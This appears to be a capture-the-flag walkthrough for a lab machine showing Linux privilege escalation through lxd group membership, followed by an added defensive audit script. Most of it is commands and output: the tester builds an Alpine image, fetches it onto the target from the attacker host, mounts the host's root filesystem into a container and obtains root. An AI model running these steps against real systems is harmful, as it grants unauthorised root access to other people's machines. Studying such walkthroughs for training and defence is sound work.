lxd group privilege escalation
Scenario: Checking the user's privileges shows one thing that can help us escalate: the user belongs to the lxd group.
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
There are known exploits showing that lxd group membership can be used to escalate privileges.
On the Kali machine:
Download and build the Alpine image:
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine 130 ⨯
--2022-04-13 21:18:47-- http://wget/
Resolving wget (wget)... failed: Name or service not known.
wget: unable to resolve host address ‘wget’
--2022-04-13 21:18:47-- https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8060 (7.9K) [text/plain]
Saving to: ‘build-alpine.1’
build-alpine.1 100%[========================================================================================>] 7.87K --.-KB/s in 0s
2022-04-13 21:18:48 (71.7 MB/s) - ‘build-alpine.1’ saved [8060/8060]
FINISHED --2022-04-13 21:18:48--
Total wall clock time: 0.6s
Downloaded: 1 files, 7.9K in 0s (71.7 MB/s)
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ sudo bash build-alpine 4 ⨯
Determining the latest release... v3.15
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.15/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.12.7-r3.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2575 100 2575 0 0 403 0 0:00:06 0:00:06 --:--:-- 481
--2022-04-13 21:19:35-- http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2575 (2.5K) [text/plain]
Saving to: ‘/home/rocky/hckbox/brainfuck/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’
/home/rocky/hckbox/brainfuck/rootfs/usr/sh 100%[========================================================================================>] 2.51K --.-KB/s in 0s
2022-04-13 21:19:36 (317 MB/s) - ‘/home/rocky/hckbox/brainfuck/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2575/2575]
Selecting mirror http://mirrors.tuna.tsinghua.edu.cn/alpine//v3.15/main
fetch http://mirrors.tuna.tsinghua.edu.cn/alpine//v3.15/main/x86_64/APKINDEX.tar.gz
(1/20) Installing musl (1.2.2-r7)
(2/20) Installing busybox (1.34.1-r5)
Executing busybox-1.34.1-r5.post-install
(3/20) Installing alpine-baselayout (3.2.0-r18)
Executing alpine-baselayout-3.2.0-r18.pre-install
Executing alpine-baselayout-3.2.0-r18.post-install
(4/20) Installing ifupdown-ng (0.11.3-r0)
(5/20) Installing openrc (0.44.7-r5)
Executing openrc-0.44.7-r5.post-install
(6/20) Installing alpine-conf (3.13.1-r0)
(7/20) Installing ca-certificates-bundle (20211220-r0)
(8/20) Installing libcrypto1.1 (1.1.1n-r0)
(9/20) Installing libssl1.1 (1.1.1n-r0)
(10/20) Installing libretls (3.3.4-r3)
(11/20) Installing ssl_client (1.34.1-r5)
(12/20) Installing zlib (1.2.12-r0)
(13/20) Installing apk-tools (2.12.7-r3)
(14/20) Installing busybox-suid (1.34.1-r5)
(15/20) Installing busybox-initscripts (4.0-r5)
Executing busybox-initscripts-4.0-r5.post-install
(16/20) Installing scanelf (1.3.3-r0)
(17/20) Installing musl-utils (1.2.2-r7)
(18/20) Installing libc-utils (0.7.2-r3)
(19/20) Installing alpine-keys (2.4-r1)
(20/20) Installing alpine-base (3.15.4-r0)
Executing busybox-1.34.1-r5.trigger
OK: 9 MiB in 20 packages
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ ls
40939.txt alltcp.txt alpine-v3.15-x86_64-20220413_2119.tar.gz
On the victim machine:
Copy the tar.gz file (the Alpine image) to the victim machine
Import the image into lxd
Initialize the image
Mount the host's / into the container at /mnt/root
cd /tmp
orestis@brainfuck:/tmp$ wget http://10.10.14.5/alpine-v3.15-x86_64-20220413_2119.tar.gz
--2022-04-14 04:34:30-- http://10.10.14.5/alpine-v3.15-x86_64-20220413_2119.tar.gz
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3241097 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.15-x86_64-20220413_2119.tar.gz’
alpine-v3.15-x86_64-20220413_2119.tar.gz 100%[========================================================================================>] 3.09M 3.69MB/s in 0.8s
2022-04-14 04:34:31 (3.69 MB/s) - ‘alpine-v3.15-x86_64-20220413_2119.tar.gz’ saved [3241097/3241097]
orestis@brainfuck:/tmp$ lxc image import ./alpine-v3.15-x86_64-20220411_1049.tar.gz --alias newimage
error: open ./alpine-v3.15-x86_64-20220411_1049.tar.gz: no such file or directory
orestis@brainfuck:/tmp$ lxc image import ./alpine-v3.15-x86_64-20220413_2119.tar.gz --alias newimage
Image imported with fingerprint: c87829dd35ed7e40f0fed6a050e22df61eeefa31b86327e368782d37fe4a7bf1
orestis@brainfuck:/tmp$ lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| alpine | 3d89962ff185 | no | alpine v3.15 (20220411_10:49) | x86_64 | 3.09MB | Apr 11, 2022 at 3:06pm (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| newimage | c87829dd35ed | no | alpine v3.15 (20220413_21:19) | x86_64 | 3.09MB | Apr 14, 2022 at 1:35am (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
orestis@brainfuck:/tmp$
initialize image
orestis@brainfuck:/tmp$ lxc config device add rchitect mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to rchitect
orestis@brainfuck:/tmp$ lxc start rchitect
orestis@brainfuck:/tmp$ lxc exec rchitect /bin/sh
~ # whomai
/bin/sh: whomai: not found
~ # whoami
root
~ # id
uid=0(root) gid=0(root)
~ #
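For defenders, the two conditions this walkthrough depends on can be audited: accounts in the lxd group (as in the `id` output above) and container disk devices whose source is the host's `/`. The following is an added example, not part of the original write-up; the function names are hypothetical, and the sample device listing is constructed on the assumption that `lxc config device show <container>` prints YAML in this shape.

```shell
#!/bin/sh
# Added audit example (not from the original page). Function names are hypothetical.

# lxd_members GROUP_FILE PASSWD_FILE
# Prints every account in the lxd group, via supplementary membership
# (/etc/group) or via primary GID (/etc/passwd), one per line, sorted.
lxd_members() {
    awk -F: '
        NR == FNR {                       # first file: group database
            if ($1 == "lxd") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") seen[m[i]] = 1
            }
            next
        }
        gid != "" && $4 == gid { seen[$1] = 1 }   # second file: primary GID match
        END { for (u in seen) print u }
    ' "$1" "$2" | LC_ALL=C sort
}

# host_root_devices: reads a device listing (YAML) on stdin and prints the
# names of disk devices whose source is the host root directory.
host_root_devices() {
    awk '
        function emit() { if (dev != "" && typ == "disk" && src == "/") print dev }
        /^[^ ].*:$/ { emit(); dev = $0; sub(/:$/, "", dev); src = ""; typ = ""; next }
        $1 == "source:" { src = $2 }
        $1 == "type:"   { typ = $2 }
        END { emit() }
    '
}

# Constructed sample, assumed to match `lxc config device show <container>` output.
sample_devices='mydevice:
  path: /mnt/root
  recursive: "true"
  source: /
  type: disk
eth0:
  nictype: bridged
  type: nic'

printf '%s\n' "$sample_devices" | host_root_devices
# On a live host: lxd_members /etc/group /etc/passwd
```

Any account listed by `lxd_members` should be treated as root-equivalent on that host, and any device reported by `host_root_devices` exposes the host filesystem to the container.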